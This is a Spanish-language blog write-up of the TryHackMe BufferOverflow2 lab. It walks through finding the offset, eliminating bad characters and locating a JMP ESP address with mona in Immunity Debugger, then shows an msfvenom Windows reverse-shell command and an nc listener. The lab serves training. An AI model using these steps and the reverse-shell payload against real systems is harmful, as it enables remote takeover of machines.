Estos son los pasos que seguimos en BufferOverflow2 de TryHackMe

Buscamos el archivo oscp.exe y corremos Immunity Debugger

!mona config -set workingfolder c:\mona\%p

Pasted image 20210615092537.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100

Pasted image 20210615092537.png

python3 exploit.py

Pasted image 20210615085619.png

!mona findmsp -distance 1100

Pasted image 20210615093235.png

!mona bytearray -b "\\x00"

Ahora cambiamos el offset en el archivo de exploit.py a 634 Y tambien rtn le ponemos un valor de "BBBB"

Pasted image 20210615094413.png

python3 bad_characters.py

Pasted image 20210615095310.png

Reiniciamos app

python3 exploit.py

Pasted image 20210615114131.png

!mona compare -f C:\mona\\oscp\bytearray.bin -a 022AFA30

Pasted image 20210615114239.png

los bad_chars son 00 23 24 3c 3d 83 84 ba bb

Quitamos el 23 del payload en el script

![[Pasted image 20210615114825.png]]

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210615115126.png

Pasted image 20210615115045.png

Pasted image 20210615115247.png

Pasted image 20210615115621.png

Ahora los bad chars serian \x00\x23\x3c

Quitamos x3c

Pasted image 20210615115740.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210615120212.png

Ahora los bad chars serian \x00\x23\x3c\x83

#no vemos 83

Pasted image 20210615120414.png

Quitamos x83

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump ![[Pasted image 20210615120541.png]]

Pasted image 20210615120807.png

Ahora los bad chars serian \x00\x23\x3c\x83\xba

#no vemos ba

Pasted image 20210615121228.png

Quitamos xba

Pasted image 20210615121354.png

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210615122417.png

Ya no seguimos mas porque bb si se encuentra en el dump

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

Pasted image 20210615123149.png

Agarramos el numero 625011bb

Pasted image 20210615123454.png

msfvenom -p windows/shell\_reverse\_tcp LHOST=YOUR\_IP LPORT=4444 EXITFUNC=thread -b "\\x00" -f c

Cambiamos el payload con lo que nos salio con msfvenom

Declaramos el valor de padding a "\x90" * 16

nc -lvnp 4444

Pasted image 20210615124812.png

blog

copyright©2022 Cu3rv0x all rights reserved